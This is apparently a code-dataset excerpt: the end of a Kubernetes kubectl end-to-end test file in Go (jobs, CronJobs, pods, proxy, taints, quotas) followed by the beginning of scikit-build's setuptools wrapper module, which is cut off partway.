label := labels.SelectorFromSet(labels.Set(map[string]string{"run": dName}))
podlist, err := framework.WaitForPodsWithLabel(c, ns, label)
if err != nil {
framework.Failf("Failed getting pod controlled by deployment %s: %v", dName, err)
}
pods := podlist.Items
if pods == nil || len(pods) != 1 || len(pods[0].Spec.Containers) != 1 || pods[0].Spec.Containers[0].Image != nginxImage {
framework.RunKubectlOrDie("get", "pods", "-L", "run", nsFlag)
framework.Failf("Failed creating 1 pod with expected image %s. Number of pods = %v", nginxImage, len(pods))
}
})
})
framework.KubeDescribe("Kubectl run job", func() {
var nsFlag string
var jobName string
BeforeEach(func() {
nsFlag = fmt.Sprintf("--namespace=%v", ns)
jobName = "e2e-test-nginx-job"
})
AfterEach(func() {
framework.RunKubectlOrDie("delete", "jobs", jobName, nsFlag)
})
/*
Release : v1.9
Testname: Kubectl, run job
Description: Command ‘kubectl run’ MUST create a deployment, with --generator=job, when a image name is specified in the run command. After the run command there SHOULD be a job that should exist with one container running the specified image. Also there SHOULD be a restart policy on the job spec that SHOULD match the command line.
*/
framework.ConformanceIt("should create a job from an image when restart is OnFailure ", func() {
By("running the image " + nginxImage)
framework.RunKubectlOrDie("run", jobName, "--restart=OnFailure", "--generator=job/v1", "--image="+nginxImage, nsFlag)
By("verifying the job " + jobName + " was created")
job, err := c.BatchV1().Jobs(ns).Get(jobName, metav1.GetOptions{})
if err != nil {
framework.Failf("Failed getting job %s: %v", jobName, err)
}
containers := job.Spec.Template.Spec.Containers
if checkContainersImage(containers, nginxImage) {
framework.Failf("Failed creating job %s for 1 pod with expected image %s: %#v", jobName, nginxImage, containers)
}
if job.Spec.Template.Spec.RestartPolicy != v1.RestartPolicyOnFailure {
framework.Failf("Failed creating a job with correct restart policy for --restart=OnFailure")
}
})
})
framework.KubeDescribe("Kubectl run CronJob", func() {
var nsFlag string
var cjName string
BeforeEach(func() {
nsFlag = fmt.Sprintf("--namespace=%v", ns)
cjName = "e2e-test-echo-cronjob-beta"
})
AfterEach(func() {
framework.RunKubectlOrDie("delete", "cronjobs", cjName, nsFlag)
})
It("should create a CronJob", func() {
framework.SkipIfMissingResource(f.DynamicClient, CronJobGroupVersionResourceBeta, f.Namespace.Name)
schedule := "*/5 * * * ?"
framework.RunKubectlOrDie("run", cjName, "--restart=OnFailure", "--generator=cronjob/v1beta1",
"--schedule="+schedule, "--image="+busyboxImage, nsFlag)
By("verifying the CronJob " + cjName + " was created")
cj, err := c.BatchV1beta1().CronJobs(ns).Get(cjName, metav1.GetOptions{})
if err != nil {
framework.Failf("Failed getting CronJob %s: %v", cjName, err)
}
if cj.Spec.Schedule != schedule {
framework.Failf("Failed creating a CronJob with correct schedule %s", schedule)
}
containers := cj.Spec.JobTemplate.Spec.Template.Spec.Containers
if checkContainersImage(containers, busyboxImage) {
framework.Failf("Failed creating CronJob %s for 1 pod with expected image %s: %#v", cjName, busyboxImage, containers)
}
if cj.Spec.JobTemplate.Spec.Template.Spec.RestartPolicy != v1.RestartPolicyOnFailure {
framework.Failf("Failed creating a CronJob with correct restart policy for --restart=OnFailure")
}
})
})
framework.KubeDescribe("Kubectl run pod", func() {
var nsFlag string
var podName string
BeforeEach(func() {
nsFlag = fmt.Sprintf("--namespace=%v", ns)
podName = "e2e-test-nginx-pod"
})
AfterEach(func() {
framework.RunKubectlOrDie("delete", "pods", podName, nsFlag)
})
/*
Release : v1.9
Testname: Kubectl, run pod
Description: Command ‘kubectl run’ MUST create a pod, with --generator=run-pod, when a image name is specified in the run command. After the run command there SHOULD be a pod that should exist with one container running the specified image.
*/
framework.ConformanceIt("should create a pod from an image when restart is Never ", func() {
By("running the image " + nginxImage)
framework.RunKubectlOrDie("run", podName, "--restart=Never", "--generator=run-pod/v1", "--image="+nginxImage, nsFlag)
By("verifying the pod " + podName + " was created")
pod, err := c.CoreV1().Pods(ns).Get(podName, metav1.GetOptions{})
if err != nil {
framework.Failf("Failed getting pod %s: %v", podName, err)
}
containers := pod.Spec.Containers
if checkContainersImage(containers, nginxImage) {
framework.Failf("Failed creating pod %s with expected image %s", podName, nginxImage)
}
if pod.Spec.RestartPolicy != v1.RestartPolicyNever {
framework.Failf("Failed creating a pod with correct restart policy for --restart=Never")
}
})
})
framework.KubeDescribe("Kubectl replace", func() {
var nsFlag string
var podName string
BeforeEach(func() {
nsFlag = fmt.Sprintf("--namespace=%v", ns)
podName = "e2e-test-nginx-pod"
})
AfterEach(func() {
framework.RunKubectlOrDie("delete", "pods", podName, nsFlag)
})
/*
Release : v1.9
Testname: Kubectl, replace
Description: Command ‘kubectl replace’ on a existing Pod with a new spec MUST update the image of the container running in the Pod. A -f option to ‘kubectl replace’ SHOULD force to re-create the resource. The new Pod SHOULD have the container with new change to the image.
*/
framework.ConformanceIt("should update a single-container pod's image ", func() {
By("running the image " + nginxImage)
framework.RunKubectlOrDie("run", podName, "--generator=run-pod/v1", "--image="+nginxImage, "--labels=run="+podName, nsFlag)
By("verifying the pod " + podName + " is running")
label := labels.SelectorFromSet(labels.Set(map[string]string{"run": podName}))
err := testutils.WaitForPodsWithLabelRunning(c, ns, label)
if err != nil {
framework.Failf("Failed getting pod %s: %v", podName, err)
}
By("verifying the pod " + podName + " was created")
podJson := framework.RunKubectlOrDie("get", "pod", podName, nsFlag, "-o", "json")
if !strings.Contains(podJson, podName) {
framework.Failf("Failed to find pod %s in [%s]", podName, podJson)
}
By("replace the image in the pod")
podJson = strings.Replace(podJson, nginxImage, busyboxImage, 1)
framework.RunKubectlOrDieInput(podJson, "replace", "-f", "-", nsFlag)
By("verifying the pod " + podName + " has the right image " + busyboxImage)
pod, err := c.CoreV1().Pods(ns).Get(podName, metav1.GetOptions{})
if err != nil {
framework.Failf("Failed getting deployment %s: %v", podName, err)
}
containers := pod.Spec.Containers
if checkContainersImage(containers, busyboxImage) {
framework.Failf("Failed creating pod with expected image %s", busyboxImage)
}
})
})
framework.KubeDescribe("Kubectl run --rm job", func() {
jobName := "e2e-test-rm-busybox-job"
/*
Release : v1.9
Testname: Kubectl, run job with --rm
Description: Start a job with a Pod using ‘kubectl run’ but specify --rm=true. Wait for the Pod to start running by verifying that there is output as expected. Now verify that the job has exited and cannot be found. With --rm=true option the job MUST start by running the image specified and then get deleted itself.
*/
framework.ConformanceIt("should create a job from an image, then delete the job ", func() {
nsFlag := fmt.Sprintf("--namespace=%v", ns)
By("executing a command with run --rm and attach with stdin")
t := time.NewTimer(runJobTimeout)
defer t.Stop()
runOutput := framework.NewKubectlCommand(nsFlag, "run", jobName, "--image="+busyboxImage, "--rm=true", "--generator=job/v1", "--restart=OnFailure", "--attach=true", "--stdin", "--", "sh", "-c", "cat && echo 'stdin closed'").
WithStdinData("abcd1234").
WithTimeout(t.C).
ExecOrDie()
Expect(runOutput).To(ContainSubstring("abcd1234"))
Expect(runOutput).To(ContainSubstring("stdin closed"))
err := framework.WaitForJobGone(c, ns, jobName, wait.ForeverTestTimeout)
Expect(err).NotTo(HaveOccurred())
By("verifying the job " + jobName + " was deleted")
_, err = c.BatchV1().Jobs(ns).Get(jobName, metav1.GetOptions{})
Expect(err).To(HaveOccurred())
Expect(apierrs.IsNotFound(err)).To(BeTrue())
})
})
framework.KubeDescribe("Proxy server", func() {
// TODO: test proxy options (static, prefix, etc)
/*
Release : v1.9
Testname: Kubectl, proxy port zero
Description: Start a proxy server on port zero by running ‘kubectl proxy’ with --port=0. Call the proxy server by requesting api versions from unix socket. The proxy server MUST provide at least one version string.
*/
framework.ConformanceIt("should support proxy with --port 0 ", func() {
By("starting the proxy server")
port, cmd, err := startProxyServer()
if cmd != nil {
defer framework.TryKill(cmd)
}
if err != nil {
framework.Failf("Failed to start proxy server: %v", err)
}
By("curling proxy /api/ output")
localAddr := fmt.Sprintf("http://localhost:%d/api/", port)
apiVersions, err := getAPIVersions(localAddr)
if err != nil {
framework.Failf("Expected at least one supported apiversion, got error %v", err)
}
if len(apiVersions.Versions) < 1 {
framework.Failf("Expected at least one supported apiversion, got %v", apiVersions)
}
})
/*
Release : v1.9
Testname: Kubectl, proxy socket
Description: Start a proxy server on by running ‘kubectl proxy’ with --unix-socket=<some path>. Call the proxy server by requesting api versions from http://locahost:0/api. The proxy server MUST provide atleast one version string
*/
framework.ConformanceIt("should support --unix-socket=/path ", func() {
By("Starting the proxy")
tmpdir, err := ioutil.TempDir("", "kubectl-proxy-unix")
if err != nil {
framework.Failf("Failed to create temporary directory: %v", err)
}
path := filepath.Join(tmpdir, "test")
defer os.Remove(path)
defer os.Remove(tmpdir)
cmd := framework.KubectlCmd("proxy", fmt.Sprintf("--unix-socket=%s", path))
stdout, stderr, err := framework.StartCmdAndStreamOutput(cmd)
if err != nil {
framework.Failf("Failed to start kubectl command: %v", err)
}
defer stdout.Close()
defer stderr.Close()
defer framework.TryKill(cmd)
buf := make([]byte, 128)
if _, err = stdout.Read(buf); err != nil {
framework.Failf("Expected output from kubectl proxy: %v", err)
}
By("retrieving proxy /api/ output")
_, err = curlUnix("http://unused/api", path)
if err != nil {
framework.Failf("Failed get of /api at %s: %v", path, err)
}
})
})
// This test must run [Serial] because it modifies the node so it doesn't allow pods to execute on
// it, which will affect anything else running in parallel.
framework.KubeDescribe("Kubectl taint [Serial]", func() {
It("should update the taint on a node", func() {
testTaint := v1.Taint{
Key: fmt.Sprintf("kubernetes.io/e2e-taint-key-001-%s", string(uuid.NewUUID())),
Value: "testing-taint-value",
Effect: v1.TaintEffectNoSchedule,
}
nodeName := scheduling.GetNodeThatCanRunPod(f)
By("adding the taint " + testTaint.ToString() + " to a node")
runKubectlRetryOrDie("taint", "nodes", nodeName, testTaint.ToString())
defer framework.RemoveTaintOffNode(f.ClientSet, nodeName, testTaint)
By("verifying the node has the taint " + testTaint.ToString())
output := runKubectlRetryOrDie("describe", "node", nodeName)
requiredStrings := [][]string{
{"Name:", nodeName},
{"Taints:"},
{testTaint.ToString()},
}
checkOutput(output, requiredStrings)
By("removing the taint " + testTaint.ToString() + " of a node")
runKubectlRetryOrDie("taint", "nodes", nodeName, testTaint.Key+":"+string(testTaint.Effect)+"-")
By("verifying the node doesn't have the taint " + testTaint.Key)
output = runKubectlRetryOrDie("describe", "node", nodeName)
if strings.Contains(output, testTaint.Key) {
framework.Failf("Failed removing taint " + testTaint.Key + " of the node " + nodeName)
}
})
It("should remove all the taints with the same key off a node", func() {
testTaint := v1.Taint{
Key: fmt.Sprintf("kubernetes.io/e2e-taint-key-002-%s", string(uuid.NewUUID())),
Value: "testing-taint-value",
Effect: v1.TaintEffectNoSchedule,
}
nodeName := scheduling.GetNodeThatCanRunPod(f)
By("adding the taint " + testTaint.ToString() + " to a node")
runKubectlRetryOrDie("taint", "nodes", nodeName, testTaint.ToString())
defer framework.RemoveTaintOffNode(f.ClientSet, nodeName, testTaint)
By("verifying the node has the taint " + testTaint.ToString())
output := runKubectlRetryOrDie("describe", "node", nodeName)
requiredStrings := [][]string{
{"Name:", nodeName},
{"Taints:"},
{testTaint.ToString()},
}
checkOutput(output, requiredStrings)
newTestTaint := v1.Taint{
Key: testTaint.Key,
Value: "another-testing-taint-value",
Effect: v1.TaintEffectPreferNoSchedule,
}
By("adding another taint " + newTestTaint.ToString() + " to the node")
runKubectlRetryOrDie("taint", "nodes", nodeName, newTestTaint.ToString())
defer framework.RemoveTaintOffNode(f.ClientSet, nodeName, newTestTaint)
By("verifying the node has the taint " + newTestTaint.ToString())
output = runKubectlRetryOrDie("describe", "node", nodeName)
requiredStrings = [][]string{
{"Name:", nodeName},
{"Taints:"},
{newTestTaint.ToString()},
}
checkOutput(output, requiredStrings)
noExecuteTaint := v1.Taint{
Key: testTaint.Key,
Value: "testing-taint-value-no-execute",
Effect: v1.TaintEffectNoExecute,
}
By("adding NoExecute taint " + noExecuteTaint.ToString() + " to the node")
runKubectlRetryOrDie("taint", "nodes", nodeName, noExecuteTaint.ToString())
defer framework.RemoveTaintOffNode(f.ClientSet, nodeName, noExecuteTaint)
By("verifying the node has the taint " + noExecuteTaint.ToString())
output = runKubectlRetryOrDie("describe", "node", nodeName)
requiredStrings = [][]string{
{"Name:", nodeName},
{"Taints:"},
{noExecuteTaint.ToString()},
}
checkOutput(output, requiredStrings)
By("removing all taints that have the same key " + testTaint.Key + " of the node")
runKubectlRetryOrDie("taint", "nodes", nodeName, testTaint.Key+"-")
By("verifying the node doesn't have the taints that have the same key " + testTaint.Key)
output = runKubectlRetryOrDie("describe", "node", nodeName)
if strings.Contains(output, testTaint.Key) {
framework.Failf("Failed removing taints " + testTaint.Key + " of the node " + nodeName)
}
})
})
framework.KubeDescribe("Kubectl create quota", func() {
It("should create a quota without scopes", func() {
nsFlag := fmt.Sprintf("--namespace=%v", ns)
quotaName := "million"
By("calling kubectl quota")
framework.RunKubectlOrDie("create", "quota", quotaName, "--hard=pods=1000000,services=1000000", nsFlag)
By("verifying that the quota was created")
quota, err := c.CoreV1().ResourceQuotas(ns).Get(quotaName, metav1.GetOptions{})
if err != nil {
framework.Failf("Failed getting quota %s: %v", quotaName, err)
}
if len(quota.Spec.Scopes) != 0 {
framework.Failf("Expected empty scopes, got %v", quota.Spec.Scopes)
}
if len(quota.Spec.Hard) != 2 {
framework.Failf("Expected two resources, got %v", quota.Spec.Hard)
}
r, found := quota.Spec.Hard[v1.ResourcePods]
if expected := resource.MustParse("1000000"); !found || (&r).Cmp(expected) != 0 {
framework.Failf("Expected pods=1000000, got %v", r)
}
r, found = quota.Spec.Hard[v1.ResourceServices]
if expected := resource.MustParse("1000000"); !found || (&r).Cmp(expected) != 0 {
framework.Failf("Expected services=1000000, got %v", r)
}
})
It("should create a quota with scopes", func() {
nsFlag := fmt.Sprintf("--namespace=%v", ns)
quotaName := "scopes"
By("calling kubectl quota")
framework.RunKubectlOrDie("create", "quota", quotaName, "--hard=pods=1000000", "--scopes=BestEffort,NotTerminating", nsFlag)
By("verifying that the quota was created")
quota, err := c.CoreV1().ResourceQuotas(ns).Get(quotaName, metav1.GetOptions{})
if err != nil {
framework.Failf("Failed getting quota %s: %v", quotaName, err)
}
if len(quota.Spec.Scopes) != 2 {
framework.Failf("Expected two scopes, got %v", quota.Spec.Scopes)
}
scopes := make(map[v1.ResourceQuotaScope]struct{})
for _, scope := range quota.Spec.Scopes {
scopes[scope] = struct{}{}
}
if _, found := scopes[v1.ResourceQuotaScopeBestEffort]; !found {
framework.Failf("Expected BestEffort scope, got %v", quota.Spec.Scopes)
}
if _, found := scopes[v1.ResourceQuotaScopeNotTerminating]; !found {
framework.Failf("Expected NotTerminating scope, got %v", quota.Spec.Scopes)
}
})
It("should reject quota with invalid scopes", func() {
nsFlag := fmt.Sprintf("--namespace=%v", ns)
quotaName := "scopes"
By("calling kubectl quota")
out, err := framework.RunKubectl("create", "quota", quotaName, "--hard=hard=pods=1000000", "--scopes=Foo", nsFlag)
if err == nil {
framework.Failf("Expected kubectl to fail, but it succeeded: %s", out)
}
})
})
})
// Checks whether the output split by line contains the required elements.
func checkOutputReturnError(output string, required [][]string) error {
outputLines := strings.Split(output, "\n")
currentLine := 0
for _, requirement := range required {
for currentLine < len(outputLines) && !strings.Contains(outputLines[currentLine], requirement[0]) {
currentLine++
}
if currentLine == len(outputLines) {
return fmt.Errorf("failed to find %s in %s", requirement[0], output)
}
for _, item := range requirement[1:] {
if !strings.Contains(outputLines[currentLine], item) {
return fmt.Errorf("failed to find %s in %s", item, outputLines[currentLine])
}
}
}
return nil
}
func checkOutput(output string, required [][]string) {
err := checkOutputReturnError(output, required)
if err != nil {
framework.Failf("%v", err)
}
}
func checkKubectlOutputWithRetry(required [][]string, args ...string) {
var pollErr error
wait.PollImmediate(time.Second, time.Minute, func() (bool, error) {
output := framework.RunKubectlOrDie(args...)
err := checkOutputReturnError(output, required)
if err != nil {
pollErr = err
return false, nil
}
pollErr = nil
return true, nil
})
if pollErr != nil {
framework.Failf("%v", pollErr)
}
return
}
func checkContainersImage(containers []v1.Container, expectImage string) bool {
return containers == nil || len(containers) != 1 || containers[0].Image != expectImage
}
func getAPIVersions(apiEndpoint string) (*metav1.APIVersions, error) {
body, err := curl(apiEndpoint)
if err != nil {
return nil, fmt.Errorf("Failed http.Get of %s: %v", apiEndpoint, err)
}
var apiVersions metav1.APIVersions
if err := json.Unmarshal([]byte(body), &apiVersions); err != nil {
return nil, fmt.Errorf("Failed to parse /api output %s: %v", body, err)
}
return &apiVersions, nil
}
func startProxyServer() (int, *exec.Cmd, error) {
// Specifying port 0 indicates we want the os to pick a random port.
cmd := framework.KubectlCmd("proxy", "-p", "0", "--disable-filter")
stdout, stderr, err := framework.StartCmdAndStreamOutput(cmd)
if err != nil {
return -1, nil, err
}
defer stdout.Close()
defer stderr.Close()
buf := make([]byte, 128)
var n int
if n, err = stdout.Read(buf); err != nil {
return -1, cmd, fmt.Errorf("Failed to read from kubectl proxy stdout: %v", err)
}
output := string(buf[:n])
match := proxyRegexp.FindStringSubmatch(output)
if len(match) == 2 {
if port, err := strconv.Atoi(match[1]); err == nil {
return port, cmd, nil
}
}
return -1, cmd, fmt.Errorf("Failed to parse port from proxy stdout: %s", output)
}
func curlUnix(url string, path string) (string, error) {
dial := func(ctx context.Context, proto, addr string) (net.Conn, error) {
var d net.Dialer
return d.DialContext(ctx, "unix", path)
}
transport := utilnet.SetTransportDefaults(&http.Transport{
DialContext: dial,
})
return curlTransport(url, transport)
}
func curlTransport(url string, transport *http.Transport) (string, error) {
client := &http.Client{Transport: transport}
resp, err := client.Get(url)
if err != nil {
return "", err
}
defer resp.Body.Close()
body, err := ioutil.ReadAll(resp.Body)
if err != nil {
return "", err
}
return string(body[:]), nil
}
func curl(url string) (string, error) {
return curlTransport(url, utilnet.SetTransportDefaults(&http.Transport{}))
}
func validateGuestbookApp(c clientset.Interface, ns string) {
framework.Logf("Waiting for all frontend pods to be Running.")
label := labels.SelectorFromSet(labels.Set(map[string]string{"tier": "frontend", "app": "guestbook"}))
err := testutils.WaitForPodsWithLabelRunning(c, ns, label)
Expect(err).NotTo(HaveOccurred())
framework.Logf("Waiting for frontend to serve content.")
if !waitForGuestbookResponse(c, "get", "", `{"data": ""}`, guestbookStartupTimeout, ns) {
framework.Failf("Frontend service did not start serving content in %v seconds.", guestbookStartupTimeout.Seconds())
}
framework.Logf("Trying to add a new entry to the guestbook.")
if !waitForGuestbookResponse(c, "set", "TestEntry", `{"message": "Updated"}`, guestbookResponseTimeout, ns) {
framework.Failf("Cannot added new entry in %v seconds.", guestbookResponseTimeout.Seconds())
}
framework.Logf("Verifying that added entry can be retrieved.")
if !waitForGuestbookResponse(c, "get", "", `{"data": "TestEntry"}`, guestbookResponseTimeout, ns) {
framework.Failf("Entry to guestbook wasn't correctly added in %v seconds.", guestbookResponseTimeout.Seconds())
}
}
// Returns whether received expected response from guestbook on time.
func waitForGuestbookResponse(c clientset.Interface, cmd, arg, expectedResponse string, timeout time.Duration, ns string) bool {
for start := time.Now(); time.Since(start) < timeout; time.Sleep(5 * time.Second) {
res, err := makeRequestToGuestbook(c, cmd, arg, ns)
if err == nil && res == expectedResponse {
return true
}
framework.Logf("Failed to get response from guestbook. err: %v, response: %s", err, res)
}
return false
}
func makeRequestToGuestbook(c clientset.Interface, cmd, value string, ns string) (string, error) {
proxyRequest, errProxy := framework.GetServicesProxyRequest(c, c.CoreV1().RESTClient().Get())
if errProxy != nil {
return "", errProxy
}
ctx, cancel := context.WithTimeout(context.Background(), framework.SingleCallTimeout)
defer cancel()
result, err := proxyRequest.Namespace(ns).
Context(ctx).
Name("frontend").
Suffix("/guestbook.php").
Param("cmd", cmd).
Param("key", "messages").
Param("value", value).
Do().
Raw()
return string(result), err
}
type updateDemoData struct {
Image string
}
const applyTestLabel = "kubectl.kubernetes.io/apply-test"
func readReplicationControllerFromString(contents string) *v1.ReplicationController {
rc := v1.ReplicationController{}
if err := yaml.Unmarshal([]byte(contents), &rc); err != nil {
framework.Failf(err.Error())
}
return &rc
}
func modifyReplicationControllerConfiguration(contents string) io.Reader {
rc := readReplicationControllerFromString(contents)
rc.Labels[applyTestLabel] = "ADDED"
rc.Spec.Selector[applyTestLabel] = "ADDED"
rc.Spec.Template.Labels[applyTestLabel] = "ADDED"
data, err := json.Marshal(rc)
if err != nil {
framework.Failf("json marshal failed: %s\n", err)
}
return bytes.NewReader(data)
}
func forEachReplicationController(c clientset.Interface, ns, selectorKey, selectorValue string, fn func(v1.ReplicationController)) {
var rcs *v1.ReplicationControllerList
var err error
for t := time.Now(); time.Since(t) < framework.PodListTimeout; time.Sleep(framework.Poll) {
label := labels.SelectorFromSet(labels.Set(map[string]string{selectorKey: selectorValue}))
options := metav1.ListOptions{LabelSelector: label.String()}
rcs, err = c.CoreV1().ReplicationControllers(ns).List(options)
Expect(err).NotTo(HaveOccurred())
if len(rcs.Items) > 0 {
break
}
}
if rcs == nil || len(rcs.Items) == 0 {
framework.Failf("No replication controllers found")
}
for _, rc := range rcs.Items {
fn(rc)
}
}
func validateReplicationControllerConfiguration(rc v1.ReplicationController) {
if rc.Name == "redis-master" {
if _, ok := rc.Annotations[v1.LastAppliedConfigAnnotation]; !ok {
framework.Failf("Annotation not found in modified configuration:\n%v\n", rc)
}
if value, ok := rc.Labels[applyTestLabel]; !ok || value != "ADDED" {
framework.Failf("Added label %s not found in modified configuration:\n%v\n", applyTestLabel, rc)
}
}
}
// getUDData creates a validator function based on the input string (i.e. kitten.jpg).
// For example, if you send "kitten.jpg", this function verifies that the image jpg = kitten.jpg
// in the container's json field.
func getUDData(jpgExpected string, ns string) func(clientset.Interface, string) error {
// getUDData validates data.json in the update-demo (returns nil if data is ok).
return func(c clientset.Interface, podID string) error {
framework.Logf("validating pod %s", podID)
ctx, cancel := context.WithTimeout(context.Background(), framework.SingleCallTimeout)
defer cancel()
body, err := c.CoreV1().RESTClient().Get().
Namespace(ns).
Resource("pods").
SubResource("proxy").
Name(podID).
Suffix("data.json").
Do().
Raw()
if err != nil {
if ctx.Err() != nil {
framework.Failf("Failed to retrieve data from container: %v", err)
}
return err
}
framework.Logf("got data: %s", body)
var data updateDemoData
if err := json.Unmarshal(body, &data); err != nil {
return err
}
framework.Logf("Unmarshalled json jpg/img => %s , expecting %s .", data, jpgExpected)
if strings.Contains(data.Image, jpgExpected) {
return nil
} else {
return fmt.Errorf("data served up in container is inaccurate, %s didn't contain %s", data, jpgExpected)
}
}
}
func noOpValidatorFn(c clientset.Interface, podID string) error { return nil }
// newBlockingReader returns a reader that allows reading the given string,
// then blocks until Close() is called on the returned closer.
//
// We're explicitly returning the reader and closer separately, because
// the closer needs to be the *os.File we get from os.Pipe(). This is required
// so the exec of kubectl can pass the underlying file descriptor to the exec
// syscall, instead of creating another os.Pipe and blocking on the io.Copy
// between the source (e.g. stdin) and the write half of the pipe.
func newBlockingReader(s string) (io.Reader, io.Closer, error) {
r, w, err := os.Pipe()
if err != nil {
return nil, nil, err
}
w.Write([]byte(s))
return r, w, nil
}
func startLocalProxy() (srv *httptest.Server, logs *bytes.Buffer) {
logs = &bytes.Buffer{}
p := goproxy.NewProxyHttpServer()
p.Verbose = true
p.Logger = log.New(logs, "", 0)
return httptest.NewServer(p), logs
}
| [
"\"HOME\""
]
| []
| [
"HOME"
]
| [] | ["HOME"] | go | 1 | 0 | |
skbuild/setuptools_wrap.py | """This module provides functionality for wrapping key infrastructure components
from distutils and setuptools.
"""
from __future__ import print_function
import argparse
import copy
import json
import os
import os.path
import platform
import stat
import sys
import warnings
from contextlib import contextmanager
# pylint: disable-next=wrong-import-order
from distutils.errors import DistutilsArgError, DistutilsError, DistutilsGetoptError
from glob import glob
from shutil import copyfile, copymode
# Must be imported before distutils
import setuptools
if sys.version_info >= (3, 0):
from io import StringIO
else:
from StringIO import StringIO
if sys.version_info >= (3, 3):
from shutil import which
else:
from .compat import which
from packaging.requirements import Requirement
from packaging.version import parse as parse_version
from setuptools.dist import Distribution as upstream_Distribution
from . import cmaker
from .command import (
bdist,
bdist_wheel,
build,
build_ext,
build_py,
clean,
egg_info,
generate_source_manifest,
install,
install_lib,
install_scripts,
sdist,
test,
)
from .constants import (
CMAKE_DEFAULT_EXECUTABLE,
CMAKE_INSTALL_DIR,
CMAKE_SPEC_FILE,
set_skbuild_plat_name,
skbuild_plat_name,
)
from .exceptions import SKBuildError, SKBuildGeneratorNotFoundError
from .utils import (
PythonModuleFinder,
mkdir_p,
parse_manifestin,
to_platform_path,
to_unix_path,
)
def create_skbuild_argparser():
"""Create and return a scikit-build argument parser."""
parser = argparse.ArgumentParser(add_help=False)
parser.add_argument(
"--build-type", default="Release", metavar="", help="specify the CMake build type (e.g. Debug or Release)"
)
parser.add_argument("-G", "--generator", metavar="", help="specify the CMake build system generator")
parser.add_argument("-j", metavar="N", type=int, dest="jobs", help="allow N build jobs at once")
parser.add_argument("--cmake-executable", default=None, metavar="", help="specify the path to the cmake executable")
parser.add_argument(
"--install-target",
default=None,
metavar="",
help="specify the CMake target performing the install. " "If not provided, uses the target ``install``",
)
parser.add_argument(
"--skip-generator-test",
action="store_true",
help="skip generator test when a generator is explicitly selected using --generator",
)
return parser
def _is_cmake_configure_argument(arg):
"""Return True if ``arg`` is a relevant argument to pass to cmake when configuring a project."""
for cmake_arg in (
"-C", # initial-cache
"-D", # <var>[:<type>]=<value>
):
if arg.startswith(cmake_arg):
return True
return False
def parse_skbuild_args(args, cmake_args, build_tool_args):
"""
Parse arguments in the scikit-build argument set. Convert specified
arguments to proper format and append to cmake_args and build_tool_args.
Returns the tuple ``(remaining arguments, cmake executable, skip_generator_test)``.
"""
parser = create_skbuild_argparser()
# Consider CMake arguments passed as global setuptools options
cmake_args.extend([arg for arg in args if _is_cmake_configure_argument(arg)])
# ... and remove them from the list
args = [arg for arg in args if not _is_cmake_configure_argument(arg)]
namespace, remaining_args = parser.parse_known_args(args)
# Construct CMake argument list
cmake_args.append("-DCMAKE_BUILD_TYPE:STRING=" + namespace.build_type)
if namespace.generator is not None:
cmake_args.extend(["-G", namespace.generator])
# Construct build tool argument list
build_tool_args.extend(["--config", namespace.build_type])
if namespace.jobs is not None:
build_tool_args.extend(["-j", str(namespace.jobs)])
if namespace.install_target is not None:
build_tool_args.extend(["--install-target", namespace.install_target])
if namespace.generator is None and namespace.skip_generator_test is True:
sys.exit("ERROR: Specifying --skip-generator-test requires --generator to also be specified.")
return remaining_args, namespace.cmake_executable, namespace.skip_generator_test
def parse_args():
"""This function parses the command-line arguments ``sys.argv`` and returns
the tuple ``(setuptools_args, cmake_executable, skip_generator_test, cmake_args, build_tool_args)``
where each ``*_args`` element corresponds to a set of arguments separated by ``--``."""
dutils = []
cmake = []
make = []
argsets = [dutils, cmake, make]
i = 0
separator = "--"
for arg in sys.argv:
if arg == separator:
i += 1
if i >= len(argsets):
sys.exit(
'ERROR: Too many "{}" separators provided '
"(expected at most {}).".format(separator, len(argsets) - 1)
)
else:
argsets[i].append(arg)
dutils, cmake_executable, skip_generator_test = parse_skbuild_args(dutils, cmake, make)
return dutils, cmake_executable, skip_generator_test, cmake, make
@contextmanager
def _capture_output():
oldout, olderr = sys.stdout, sys.stderr
try:
out = [StringIO(), StringIO()]
sys.stdout, sys.stderr = out
yield out
finally:
sys.stdout, sys.stderr = oldout, olderr
out[0] = out[0].getvalue()
out[1] = out[1].getvalue()
def _parse_setuptools_arguments(setup_attrs):
"""This function instantiates a Distribution object and
parses the command line arguments.
It returns the tuple ``(display_only, help_commands, commands, hide_listing, force_cmake, skip_cmake, plat_name)``
where
- display_only is a boolean indicating if an argument like '--help',
'--help-commands' or '--author' was passed.
- help_commands is a boolean indicating if argument '--help-commands'
was passed.
- commands contains the list of commands that were passed.
- hide_listing is a boolean indicating if the list of files being included
in the distribution is displayed or not.
- force_cmake a boolean indicating that CMake should always be executed.
- skip_cmake is a boolean indicating if the execution of CMake should
explicitly be skipped.
- plat_name is a string identifying the platform name to embed in generated
filenames. It defaults to :func:`skbuild.constants.skbuild_plat_name()`.
- build_ext_inplace is a boolean indicating if ``build_ext`` command was
specified along with the --inplace argument.
Otherwise it raises DistutilsArgError exception if there are
any error on the command-line, and it raises DistutilsGetoptError
if there any error in the command 'options' attribute.
The code has been adapted from the setup() function available
in distutils/core.py.
"""
setup_attrs = dict(setup_attrs)
setup_attrs["script_name"] = os.path.basename(sys.argv[0])
dist = upstream_Distribution(setup_attrs)
# Update class attribute to also ensure the argument is processed
# when ``setuptools.setup`` is called.
upstream_Distribution.global_options.extend(
[
("hide-listing", None, "do not display list of files being " "included in the distribution"),
("force-cmake", None, "always run CMake"),
("skip-cmake", None, "do not run CMake"),
]
)
# Find and parse the config file(s): they will override options from
# the setup script, but be overridden by the command line.
dist.parse_config_files()
# Parse the command line and override config files; any
# command-line errors are the end user's fault, so turn them into
# SystemExit to suppress tracebacks.
with _capture_output():
result = dist.parse_command_line()
display_only = not result
if not hasattr(dist, "hide_listing"):
dist.hide_listing = False
if not hasattr(dist, "force_cmake"):
dist.force_cmake = False
if not hasattr(dist, "skip_cmake"):
dist.skip_cmake = False
plat_names = set()
for cmd in [dist.get_command_obj(command) for command in dist.commands]:
if getattr(cmd, "plat_name", None) is not None:
plat_names.add(cmd.plat_name)
if not plat_names:
plat_names.add(None)
elif len(plat_names) > 1:
raise SKBuildError("--plat-name is ambiguous: %s" % ", ".join(plat_names))
plat_name = list(plat_names)[0]
build_ext_inplace = dist.get_command_obj("build_ext").inplace
return (
display_only,
dist.help_commands,
dist.commands,
dist.hide_listing,
dist.force_cmake,
dist.skip_cmake,
plat_name,
build_ext_inplace,
)
def _check_skbuild_parameters(skbuild_kw):
cmake_install_dir = skbuild_kw["cmake_install_dir"]
if os.path.isabs(cmake_install_dir):
raise SKBuildError(
(
"\n setup parameter 'cmake_install_dir' is set to "
